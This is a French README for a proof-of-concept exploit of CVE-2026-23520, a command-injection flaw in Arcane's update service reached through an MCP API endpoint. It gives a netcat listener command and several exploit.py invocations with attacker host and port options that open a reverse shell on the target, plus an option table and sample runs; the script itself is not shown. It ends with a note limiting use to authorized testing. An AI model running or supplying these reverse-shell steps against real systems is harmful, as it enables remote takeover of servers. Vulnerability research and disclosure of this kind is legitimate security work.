
Preuve de concept d'exploitation pour CVE-2026-23520, une vulnérabilité d'injection de commandes dans le service de mise à jour d'Arcane, permettant l'exécution de code à distance via des requêtes API spécialement conçues.
Ce dépôt contient une preuve de concept (PoC) d'exploitation d'une vulnérabilité d'exécution de commandes à distance (RCE) affectant les applications qui exposent un point de terminaison d'API MCP vulnérable (généralement /api/mcp/connect).
La vulnérabilité permet l'exécution de commandes au niveau du système via une requête API spécialement conçue.
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| Argument | Description |
|---|---|
| target | IP, domaine ou URL cible |
| --lhost | IP de l'attaquant |
| --lport | Port de l'attaquant |
| Flag | Description |
|---|---|
| -p, --port | Port cible (défaut : 443) |
| -s, --scheme | http ou https (défaut : https) |
| -e, --endpoint | Chemin du point de terminaison API |
| -t, --timeout | Délai d'expiration de la requête |
| -v, --verbose | Sortie de débogage |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash est disponible.Réservé aux tests autorisés et à des fins éducatives uniquement.
Parosh B